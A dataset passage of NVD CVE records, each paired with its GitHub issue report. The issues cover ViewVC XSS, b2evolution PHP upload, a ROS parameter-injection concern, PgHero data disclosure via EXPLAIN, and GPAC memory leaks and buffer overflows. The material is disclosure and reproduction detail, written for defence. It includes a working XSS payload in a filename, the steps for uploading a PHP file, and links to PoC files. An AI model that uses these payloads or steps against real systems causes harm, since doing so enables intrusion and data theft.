"Third Party Advisory"
],
"url": "https://github.com/viewvc/viewvc/issues/311"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/viewvc/viewvc/releases/tag/1.1.29"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/viewvc/viewvc/releases/tag/1.2.2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/viewvc/viewvc/security/advisories/GHSA-j4mx-f97j-gc5g"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:viewvc:viewvc:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB51E00C-7F8B-426A-80EF-C57BDE6DE88F",
"versionEndExcluding": "1.1.29",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:viewvc:viewvc:*:*:*:*:*:*:*:*",
"matchCriteriaId": "227BB175-E196-488C-9E25-3F39111283E9",
"versionEndExcluding": "1.2.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.2.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/viewvc/viewvc/issues/311 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"viewvc",
"viewvc"
] | **Describe the bug**
The filename is not properly escaped, and HTML in a filename is rendered in the browser. This is when viewing the changed file in a revision, behind the "View Changeset" link.
**Steps to reproduce the behavior**
1. Create a SVN repository with a file in it named like this:
```
<h1 onmouseover=alert`XSS`>XSS
```
2. Visit http://localhost:49152/viewvc/Development?revision=1&view=revision
The path shows `XSS` in big letters, and when the mouse moves over it a JavaScript popup shows.
**Expected behavior**
Path shows `<h1 onmouseover=alert'XSS'>XSS`.
**Additional context**

This is in the current master version, cf136ba4e3cf9. | XSS in changed paths when reviewing revision | https://api.github.com/repos/viewvc/viewvc/issues/311/comments | 15 | 2023-01-02T20:38:18Z | 2023-01-05T10:31:05Z | https://github.com/viewvc/viewvc/issues/311 | 1,516,704,446 | 311 | 4,573 |
CVE-2022-44036 | 2023-01-03T21:15:12.880 | In b2evolution 7.2.5, if configured with admins_can_manipulate_sensitive_files, arbitrary file upload is allowed for admins, leading to command execution. NOTE: the vendor's position is that this is "very obviously a feature not an issue and if you don't like that feature it is very obvious how to disable it." | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/b2evolution/b2evolution/issues/121"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/b2evolution/b2evolution/issues/121"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:b2evolution:b2evolution_cms:7.2.5:*:*:*:*:*:*:*",
"matchCriteriaId": "A7B288B3-7FAB-4EF8-923C-710E6DA872E5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/b2evolution/b2evolution/issues/121 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"b2evolution",
"b2evolution"
] | 1. conf/_advanced.php -> $admins_can_manipulate_sensitive_files: set to true
<img width="1090" alt="image" src="https://user-images.githubusercontent.com/23633137/210027978-b15b7c78-76aa-47fe-942f-95cc2263de7a.png">
2. After the admin logged in, access URL http://localhost/index.php/a/extended-post, at "Drag & Drop files to upload here" Uploading php Files

3. The php file is stored in media/blogs/a/quick-uploads/
 | b2evolution v7.2.5 hava a arbitrary file upload Vulnerability | https://api.github.com/repos/b2evolution/b2evolution/issues/121/comments | 1 | 2022-12-30T02:53:44Z | 2023-01-01T12:28:13Z | https://github.com/b2evolution/b2evolution/issues/121 | 1,514,198,870 | 121 | 4,574 |
CVE-2022-48217 | 2023-01-04T19:15:09.517 | The tf_remapper_node component 1.1.1 for Robot Operating System (ROS) allows attackers, who control the source code of a different node in the same ROS application, to change a robot's behavior. This occurs because a topic name depends on the attacker-controlled old_tf_topic_name and/or new_tf_topic_name parameter. NOTE: the vendor's position is "it is the responsibility of the programmer to make sure that only known and required parameters are set and unexpected parameters are not." | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tradr-project/tf_remapper_cpp/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tradr-project/tf_remapper_cpp/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tradr-project:tf_remapper:1.1.1:*:*:*:*:robot_operating_system:*:*",
"matchCriteriaId": "D7356FC1-E3F7-440B-BF28-57945CFE8C70",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"75"
] | 75 | https://github.com/tradr-project/tf_remapper_cpp/issues/1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"tradr-project",
"tf_remapper_cpp"
] | Hi,
We notice that you are using topic names from ROS parameter at the following locations:
https://github.com/tradr-project/tf_remapper_cpp/blob/59eca1c1592ed38f6f042cd258d5f5fc5a6e683f/src/tf_remapper_node.cpp#L54
https://github.com/tradr-project/tf_remapper_cpp/blob/59eca1c1592ed38f6f042cd258d5f5fc5a6e683f/src/tf_remapper_node.cpp#L56
https://github.com/tradr-project/tf_remapper_cpp/blob/59eca1c1592ed38f6f042cd258d5f5fc5a6e683f/src/tf_remapper_node.cpp#L60
https://github.com/tradr-project/tf_remapper_cpp/blob/59eca1c1592ed38f6f042cd258d5f5fc5a6e683f/src/tf_remapper_node.cpp#L62
For security reasons detailed below, we strongly suggest avoiding the usage of strings from parameters as topic names.
Although parameters are usually set in parameter files, they can also be changed by nodes. Specifically, other nodes in the same ROS application can also change the parameters listed above before it’s used, either by accident or *intentionally* (i.e., by potential attackers).
Such changes can lead to disruption of the remapper functionality, as the input or the output tf topic is changed. Moreover, if an attacker exists, she can even change the tf message content by first fool the remapper to publish to a wrong topic like `/tf_fake`, and then forwarding messages from `/tf_fake` to `/tf` after modifying the message contents. Downstream functionalities like navigation will be affected, and severe consequences such as crashes may happen. Because ROS is an OSS (open-source software) community, third-party nodes are widely used in ROS applications, usually without complete vetting of their behavior, which gives the opportunity to potentially malicious actors to inject malicious code (e.g, by submitting hypocrite commits like in other OSS systems [1]) to infiltrate the ROS applications that use it (or software supply chain attacks, one of the primary means for real-world attackers today [2]).
We understand that using parameters to set topic names brings flexibility. Still, for the purpose of security, we strongly suggest that you avoid such vulnerable programming patterns if possible. For example, to avoid the exposure of this specific vulnerability, you may consider alternatives like remapping, which is designed for configuring names when launching the nodes.
[1] Q. Wu and K. Lu, “On the feasibility of stealthily introducing vulnerabilities in open-source software via hypocrite commits,” 2021, https://linuxreviews.org/images/d/d9/OpenSourceInsecurity.pdf.
[2] Supply chain attacks are the hacker’s new favourite weapon. and the threat is getting bigger. https://www.zdnet.com/article/supply-chain-attacks-are-the-hackers-new-favourite-weapon-and-the-threat-is-getting-bigger/. | Potential vulnerability: topic names from ROS parameters | https://api.github.com/repos/tradr-project/tf_remapper_cpp/issues/1/comments | 1 | 2022-12-28T04:00:57Z | 2022-12-28T09:21:55Z | https://github.com/tradr-project/tf_remapper_cpp/issues/1 | 1,512,373,245 | 1 | 4,575 |
CVE-2023-22626 | 2023-01-05T08:15:08.947 | PgHero before 3.1.0 allows Information Disclosure via EXPLAIN because query results may be present in an error message. (Depending on database user privileges, this may only be information from the database, or may be information from file contents on the database server.) | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ankane/pghero/issues/439"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ankane/pghero/issues/439"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pghero_project:pghero:*:*:*:*:*:ruby:*:*",
"matchCriteriaId": "9CC3B8EB-0B8D-4471-BD21-5EB23EEB2DE0",
"versionEndExcluding": "3.1.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "0.1.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"209"
] | 209 | https://github.com/ankane/pghero/issues/439 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ankane",
"pghero"
] | PgHero can expose data to users through the EXPLAIN feature. This vulnerability has been assigned the CVE identifier CVE-2023-22626.
Versions Affected: 0.1.1 to 3.0.1
Fixed Versions: 3.1.0
## Impact
A malicious PgHero user can use the EXPLAIN functionality to extract data from the database. With certain inputs, a user can get the results of a query to appear in an error message. If the PgHero database user has superuser privileges (not recommended), the user can use [file access functions](https://www.postgresql.org/docs/current/functions-admin.html#FUNCTIONS-ADMIN-GENFILE) to read files on the database server.
## Mitigation
All users running an affected version should upgrade when possible.
See #438 for related EXPLAIN security considerations and changes in this release.
## Credit
Thanks to Seryun Ham of https://horangi.com ([blog](https://b3cl4ssy.tistory.com)) for reporting this. | Information Disclosure Through EXPLAIN Feature | https://api.github.com/repos/ankane/pghero/issues/439/comments | 0 | 2023-01-05T06:03:52Z | 2023-01-11T23:11:09Z | https://github.com/ankane/pghero/issues/439 | 1,520,139,028 | 439 | 4,576 |
CVE-2022-46489 | 2023-01-05T15:15:10.483 | GPAC version 2.1-DEV-rev505-gb9577e6ad-master was discovered to contain a memory leak via the gf_isom_box_parse_ex function at box_funcs.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2328"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2328"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"401"
] | 401 | https://github.com/gpac/gpac/issues/2328 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | A memory leak has occurred when running program MP4Box, this can reproduce on the lattest commit.
### Version
```
$ ./MP4Box -version
MP4Box - GPAC version 2.1-DEV-rev505-gb9577e6ad-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --static-build --extra-cflags=-fsanitize=address -g --extra-ldflags=-fsanitize=address -g
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB
```
git log
```
commit b9577e6ad91ef96decbcd369227ab02b2842c77f (HEAD -> master, origin/master, origin/HEAD)
Author: jeanlf <jeanlf@gpac.io>
Date: Fri Nov 25 16:53:55 2022 +0100
```
### Verification steps
```
export CFLAGS='-fsanitize=address -g'
export CC=/usr/bin/clang
export CXX=/usr/bin/clang++
git clone https://github.com/gpac/gpac.git
cd gpac
./configure --static-build --extra-cflags="${CFLAGS}" --extra-ldflags="${CFLAGS}"
make
cd bin/gcc
./MP4Box -info $poc
```
### POC file
https://github.com/HotSpurzzZ/testcases/blob/main/gpac/gpac_Direct_leak_gf_isom_box_parse_ex.mp4
### AddressSanitizer output
```
$ ./MP4Box -info gpac_Direct_leak_gf_isom_box_parse_ex.mp4
[iso file] Failed to uncompress payload for box type !ssx (0x21737378)
Error opening file gpac_Direct_leak_gf_isom_box_parse_ex.mp4: BitStream Not Compliant
=================================================================
==10575==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 1718840668 byte(s) in 1 object(s) allocated from:
#0 0x4a186d in malloc (/root/Desktop/gpac/bin/gcc/MP4Box+0x4a186d)
#1 0x7dfc41 in gf_isom_box_parse_ex /root/Desktop/gpac/src/isomedia/box_funcs.c:166:13
#2 0x7df29c in gf_isom_parse_root_box /root/Desktop/gpac/src/isomedia/box_funcs.c:38:8
Direct leak of 4096 byte(s) in 1 object(s) allocated from:
#0 0x4a186d in malloc (/root/Desktop/gpac/bin/gcc/MP4Box+0x4a186d)
#1 0x599d69 in gf_gz_decompress_payload /root/Desktop/gpac/src/utils/base_encoding.c:257:31
#2 0x7dfc66 in gf_isom_box_parse_ex /root/Desktop/gpac/src/isomedia/box_funcs.c:170:9
#3 0x7df29c in gf_isom_parse_root_box /root/Desktop/gpac/src/isomedia/box_funcs.c:38:8
SUMMARY: AddressSanitizer: 1718844764 byte(s) leaked in 2 allocation(s).
```
| Memory leak in gf_isom_box_parse_ex function of box_funcs.c:166:13 | https://api.github.com/repos/gpac/gpac/issues/2328/comments | 0 | 2022-11-28T06:47:39Z | 2022-11-28T10:06:52Z | https://github.com/gpac/gpac/issues/2328 | 1,465,902,126 | 2,328 | 4,577 |
CVE-2022-46490 | 2023-01-05T15:15:10.527 | GPAC version 2.1-DEV-rev505-gb9577e6ad-master was discovered to contain a memory leak via the afrt_box_read function at box_code_adobe.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2327"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2327"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"401"
] | 401 | https://github.com/gpac/gpac/issues/2327 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | A memory leak has occurred when running program MP4Box, this can reproduce on the lattest commit.
### Version
```
$ ./MP4Box -version
MP4Box - GPAC version 2.1-DEV-rev505-gb9577e6ad-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --static-build --extra-cflags=-fsanitize=address -g --extra-ldflags=-fsanitize=address -g
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB
```
git log
```
commit b9577e6ad91ef96decbcd369227ab02b2842c77f (HEAD -> master, origin/master, origin/HEAD)
Author: jeanlf <jeanlf@gpac.io>
Date: Fri Nov 25 16:53:55 2022 +0100
```
### Verification steps
```
export CFLAGS='-fsanitize=address -g'
export CC=/usr/bin/clang
export CXX=/usr/bin/clang++
git clone https://github.com/gpac/gpac.git
cd gpac
./configure --static-build --extra-cflags="${CFLAGS}" --extra-ldflags="${CFLAGS}"
make
cd bin/gcc
./MP4Box -info $poc
```
### POC file
https://github.com/HotSpurzzZ/testcases/blob/main/gpac/gpac_Direct_leak_afrt_box_read.mp4
### AddressSanitizer output
```
$ ./MP4Box -info gpac_Direct_leak_afrt_box_read.mp4
[isom] not enough bytes in box afrt: 0 left, reading 1 (file isomedia/box_code_adobe.c, line 713)
[iso file] Read Box "afrt" (start 0) failed (Invalid IsoMedia File) - skipping
Error opening file gpac_Direct_leak_afrt_box_read.mp4: Invalid IsoMedia File
=================================================================
==10525==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 24 byte(s) in 1 object(s) allocated from:
#0 0x4a186d in malloc (/root/Desktop/gpac/bin/gcc/MP4Box+0x4a186d)
#1 0x902c18 in afrt_box_read /root/Desktop/gpac/src/isomedia/box_code_adobe.c:706:35
SUMMARY: AddressSanitizer: 24 byte(s) leaked in 1 allocation(s).
```
| Memory leak in afrt_box_read function of box_code_adobe.c:706:35 | https://api.github.com/repos/gpac/gpac/issues/2327/comments | 0 | 2022-11-28T06:30:26Z | 2022-11-28T10:06:51Z | https://github.com/gpac/gpac/issues/2327 | 1,465,889,278 | 2,327 | 4,578 |
CVE-2022-47087 | 2023-01-05T15:15:10.620 | GPAC MP4box 2.1-DEV-rev574-g9d5bb184b has a Buffer overflow in gf_vvc_read_pps_bs_internal function of media_tools/av_parsers.c | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2339"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2339"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/gpac/gpac/issues/2339 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
# Description
buffer overflow in gf_vvc_read_pps_bs_internal function of media_tools/av_parsers.c
```c
while (nb_ctb_left >= uni_size_ctb) {
nb_ctb_left -= uni_size_ctb;
pps->tile_rows_height_ctb[pps->num_tile_rows] = uni_size_ctb; // when pps->num_tile_rows == 32, overflow at pps->tile_rows_height_ctb
pps->num_tile_rows++;
}
```
# Version info
```
MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
# Reproduce
compile and run
```
./configure --enable-sanitizer
make
./MP4Box import -add poc_bof2.mp4
```
Crash reported by sanitizer
```
[Core] exp-golomb read failed, not enough bits in bitstream !
[VVC] Warning: Error parsing NAL unit
media_tools/av_parsers.c:10985:29: runtime error: index 33 out of bounds for type 'u32 [33]'
```
# POC
[poc_bof2.zip](https://github.com/gpac/gpac/files/10199807/poc_bof2.zip)
# Impact
Potentially causing DoS and RCE
# Credit
Xdchase
| Buffer overflow in gf_vvc_read_pps_bs_internal function of media_tools/av_parsers.c | https://api.github.com/repos/gpac/gpac/issues/2339/comments | 0 | 2022-12-10T10:00:27Z | 2022-12-12T09:59:01Z | https://github.com/gpac/gpac/issues/2339 | 1,488,317,476 | 2,339 | 4,579 |
CVE-2022-47088 | 2023-01-05T15:15:10.663 | GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer Overflow. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2340"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2340"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/gpac/gpac/issues/2340 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
# Description
buffer overflow in gf_vvc_read_pps_bs_internal function of media_tools/av_parsers.c
```c
while (nb_ctb_left >= uni_size_ctb) {
nb_ctb_left -= uni_size_ctb;
pps->tile_cols_width_ctb[pps->num_tile_cols] = uni_size_ctb; // when pps->num_tile_cols == 30, overflow at pps->tile_cols_width_ctb
pps->num_tile_cols++;
}
```
# Version info
```
MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://doi.org/10.1145/1291233.1291452
GPAC Configuration: --enable-sanitizer
Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D
```
# Reproduce
compile and run
```
./configure --enable-sanitizer
make
./MP4Box import -add poc_bof3.mp4
```
Crash reported by sanitizer
```
[Core] exp-golomb read failed, not enough bits in bitstream !
[VVC] Warning: Error parsing NAL unit
[Core] exp-golomb read failed, not enough bits in bitstream !
media_tools/av_parsers.c:10964:28: runtime error: index 30 out of bounds for type 'u32 [30]'
```
# POC
[poc_bof3.zip](https://github.com/gpac/gpac/files/10199841/poc_bof3.zip)
# Impact
Potentially causing DoS and RCE
# Credit
Xdchase
